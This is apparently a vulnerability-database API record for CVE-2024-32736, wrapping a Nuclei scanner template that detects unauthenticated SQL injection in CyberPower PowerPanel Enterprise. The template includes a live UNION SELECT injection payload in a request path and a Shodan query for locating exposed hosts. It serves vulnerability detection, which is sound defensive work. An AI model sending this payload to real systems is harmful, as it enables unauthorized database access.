{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2024-32736/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2024-32736/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2024-32736/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2024-32736/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2024-32736/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2024-32736"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2024-32736"
    }
  },
  "data": {
    "nuclei": true,
    "nuclei_template": "http/cves/2024/CVE-2024-32736.yaml",
    "nuclei_template_severity": "high",
    "nuclei_template_yaml": "id: CVE-2024-32736\n\ninfo:\n  name: CyberPower < v2.8.3 - SQL Injection\n  author: DhiyaneshDk\n  severity: high\n  description: |\n    A sql injection vulnerability exists in CyberPower PowerPanel Enterprise prior to .\n  remediation: |\n    Apply the latest security patches and updates from the vendor to address this vulnerability.\n  impact: |\n    An unauthenticated remote attacker can leak sensitive information via the \"query_utask_verbose\" function within MCUDBHelper.\n  reference:\n    - https://www.cyberpower.com/global/en/File/GetFileSampleByType?fileId=SU-18070002-07&fileSubType=FileReleaseNote\n    - https://www.tenable.com/security/research/tra-2024-14\n    - https://nvd.nist.gov/vuln/detail/CVE-2024-32736\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n    cvss-score: 7.5\n    cve-id: CVE-2024-32736\n    epss-score: 0.05408\n    epss-percentile: 0.92339\n  metadata:\n    verified: true\n    max-request: 1\n    shodan-query: html:\"<title>PDNU</title>\"\n  tags: cve,cve2024,cyberpower,sqli,vkev,vuln\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/api/v1/confup?mode=&uid=1'%20UNION%20select%201,2,3,4,sqlite_version();--\"\n\n    matchers-condition: and\n    matchers:\n      - type: regex\n        regex:\n          - '\"code\":\"([0-9.]+)\"'\n\n      - type: word\n        part: body\n        words:\n          - '\"results\":'\n          - '{\"status\":\"finished'\n        condition: and\n\n      - type: word\n        part: content_type\n        words:\n          - 'application/json'\n\n      - type: status\n        status:\n          - 200\n\n    extractors:\n      - type: regex\n        group: 1\n        regex:\n          - '\"code\":\"([0-9.]+)\"'\n# digest: 4a0a00473045022100a66ce411e0da067e93dc76147fd3fa471567beadb09a805097fff006e12dc76b022068fddf8016f2e9c0efedea93c06ed110f8d39d72cb1241fc0d3315857965d3b0:922c64590222798bb761d5b6d8e72950"
  },
  "source": "nuclei",
  "vuln_id": "cve-2024-32736"
}